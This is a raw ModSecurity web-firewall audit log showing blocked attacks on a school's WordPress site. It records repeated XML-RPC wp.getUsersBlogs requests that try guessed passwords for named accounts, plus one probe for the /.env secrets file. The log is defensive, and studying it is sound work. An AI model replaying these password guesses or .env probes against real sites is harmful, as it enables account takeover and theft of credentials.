[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287991222876 5324 (- - -) Stopwatch2: 1749287991222876 5324; combined=3564, p1=501, p2=2898, p3=0, p4=0, p5=97, sr=87, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34aea609-Z-- --80dde223-A-- [07/Jun/2025:16:20:51 +0700] aEQEc5ANhDjQAvBdMyHxGgAAAJU 103.236.140.4 40872 103.236.140.4 8181 --80dde223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --80dde223-C-- wp.getUsersBlogs kesiswaan Marketing2018 --80dde223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80dde223-E-- --80dde223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288051694930 5843 (- - -) Stopwatch2: 1749288051694930 5843; combined=4186, p1=585, p2=3381, p3=0, p4=0, p5=125, sr=166, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80dde223-Z-- --69c36831-A-- [07/Jun/2025:16:21:54 +0700] aEQEsvClubEPOra_8UkjlgAAABM 103.236.140.4 43012 103.236.140.4 8181 --69c36831-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69c36831-C-- wp.getUsersBlogs kesiswaan Marketing --69c36831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69c36831-E-- --69c36831-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (105+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288114548561 4483 (- - -) Stopwatch2: 1749288114548561 4483; combined=3253, p1=374, p2=2727, p3=0, p4=0, p5=90, sr=68, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69c36831-Z-- --1ae38d1f-A-- [07/Jun/2025:16:22:54 +0700] aEQE7mCOO9DrcKL2J_4TwAAAANc 103.236.140.4 45400 103.236.140.4 8181 --1ae38d1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ae38d1f-C-- wp.getUsersBlogs kesiswaan 888888 --1ae38d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ae38d1f-E-- --1ae38d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288174693123 5040 (- - -) Stopwatch2: 1749288174693123 5040; combined=3882, p1=458, p2=3243, p3=0, p4=0, p5=107, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ae38d1f-Z-- --0dd98d05-A-- [07/Jun/2025:16:23:54 +0700] aEQFKvClubEPOra_8UklCwAAABU 103.236.140.4 48304 103.236.140.4 8181 --0dd98d05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0dd98d05-C-- wp.getUsersBlogs kesiswaan q1w2e3r4 --0dd98d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dd98d05-E-- --0dd98d05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288234160310 5054 (- - -) Stopwatch2: 1749288234160310 5054; combined=3855, p1=452, p2=3204, p3=0, p4=0, p5=117, sr=87, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dd98d05-Z-- --66fee25e-A-- [07/Jun/2025:16:24:54 +0700] aEQFZvClubEPOra_8UklhgAAAAg 103.236.140.4 51218 103.236.140.4 8181 --66fee25e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66fee25e-C-- wp.getUsersBlogs kesiswaan 123456qwe --66fee25e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66fee25e-E-- --66fee25e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288294225894 5027 (- - -) Stopwatch2: 1749288294225894 5027; combined=3703, p1=518, p2=2999, p3=0, p4=0, p5=109, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66fee25e-Z-- --dc24eb30-A-- [07/Jun/2025:16:25:20 +0700] aEQFgGCOO9DrcKL2J_4V6AAAAMY 103.236.140.4 52592 103.236.140.4 8181 --dc24eb30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dc24eb30-C-- wp.getUsersBlogs kesiswaan 1234%^&* --dc24eb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc24eb30-E-- --dc24eb30-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288320903495 4782 (- - -) Stopwatch2: 1749288320903495 4782; combined=3279, p1=405, p2=2722, p3=0, p4=0, p5=92, sr=71, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc24eb30-Z-- --237ecd5d-A-- [07/Jun/2025:16:25:54 +0700] aEQFovClubEPOra_8UkmBAAAAA8 103.236.140.4 54224 103.236.140.4 8181 --237ecd5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --237ecd5d-C-- wp.getUsersBlogs kesiswaan charlie --237ecd5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --237ecd5d-E-- --237ecd5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288354359768 5348 (- - -) Stopwatch2: 1749288354359768 5348; combined=3982, p1=484, p2=3309, p3=0, p4=0, p5=111, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --237ecd5d-Z-- --7dd78038-A-- [07/Jun/2025:16:26:54 +0700] aEQF3vClubEPOra_8UkmfgAAAA0 103.236.140.4 57036 103.236.140.4 8181 --7dd78038-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7dd78038-C-- wp.getUsersBlogs kesiswaan a801016 --7dd78038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dd78038-E-- --7dd78038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288414471211 5262 (- - -) Stopwatch2: 1749288414471211 5262; combined=3956, p1=471, p2=3305, p3=0, p4=0, p5=106, sr=87, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dd78038-Z-- --fd089848-A-- [07/Jun/2025:16:27:54 +0700] aEQGGhK9gc79coX6mHSmSAAAAEc 103.236.140.4 59990 103.236.140.4 8181 --fd089848-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fd089848-C-- wp.getUsersBlogs timkreatif testing --fd089848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd089848-E-- --fd089848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288474567702 5677 (- - -) Stopwatch2: 1749288474567702 5677; combined=3580, p1=540, p2=2855, p3=0, p4=0, p5=116, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd089848-Z-- --865b9a23-A-- [07/Jun/2025:16:28:54 +0700] aEQGVhK9gc79coX6mHSnFwAAAFE 103.236.140.4 34860 103.236.140.4 8181 --865b9a23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --865b9a23-C-- wp.getUsersBlogs timkreatif booboo --865b9a23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --865b9a23-E-- --865b9a23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288534481243 5381 (- - -) Stopwatch2: 1749288534481243 5381; combined=4225, p1=472, p2=3463, p3=0, p4=0, p5=161, sr=88, sw=129, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --865b9a23-Z-- --41ff8c20-A-- [07/Jun/2025:16:29:54 +0700] aEQGkpANhDjQAvBdMyH4MwAAAIg 103.236.140.4 37946 103.236.140.4 8181 --41ff8c20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --41ff8c20-C-- wp.getUsersBlogs timkreatif marketing2024_ --41ff8c20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41ff8c20-E-- --41ff8c20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288594357694 5812 (- - -) Stopwatch2: 1749288594357694 5812; combined=4128, p1=551, p2=3310, p3=0, p4=0, p5=156, sr=145, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41ff8c20-Z-- --7d8bf07d-A-- [07/Jun/2025:16:30:54 +0700] aEQGzpANhDjQAvBdMyH40gAAAJA 103.236.140.4 40564 103.236.140.4 8181 --7d8bf07d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7d8bf07d-C-- wp.getUsersBlogs timkreatif samuel --7d8bf07d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d8bf07d-E-- --7d8bf07d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288654058303 5900 (- - -) Stopwatch2: 1749288654058303 5900; combined=4132, p1=489, p2=3444, p3=0, p4=0, p5=115, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d8bf07d-Z-- --a8d8571c-A-- [07/Jun/2025:16:31:54 +0700] aEQHCpANhDjQAvBdMyH5XgAAAJU 103.236.140.4 43094 103.236.140.4 8181 --a8d8571c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8d8571c-C-- wp.getUsersBlogs timkreatif access --a8d8571c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8d8571c-E-- --a8d8571c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288714261370 5838 (- - -) Stopwatch2: 1749288714261370 5838; combined=4210, p1=571, p2=3450, p3=0, p4=0, p5=112, sr=96, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8d8571c-Z-- --8a75df48-A-- [07/Jun/2025:16:32:41 +0700] aEQHORK9gc79coX6mHSqHwAAAEY 103.236.140.4 45184 103.236.140.4 8181 --8a75df48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --8a75df48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a75df48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749288761334587 774 (- - -) Stopwatch2: 1749288761334587 774; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a75df48-Z-- --dc583d26-A-- [07/Jun/2025:16:32:54 +0700] aEQHRmCOO9DrcKL2J_4cmQAAANg 103.236.140.4 45796 103.236.140.4 8181 --dc583d26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dc583d26-C-- wp.getUsersBlogs timkreatif controller --dc583d26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc583d26-E-- --dc583d26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288774268005 5353 (- - -) Stopwatch2: 1749288774268005 5353; combined=4066, p1=506, p2=3375, p3=0, p4=0, p5=110, sr=115, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc583d26-Z-- --77b50f7d-A-- [07/Jun/2025:16:33:54 +0700] aEQHgvClubEPOra_8UkrQAAAABE 103.236.140.4 48438 103.236.140.4 8181 --77b50f7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --77b50f7d-C-- 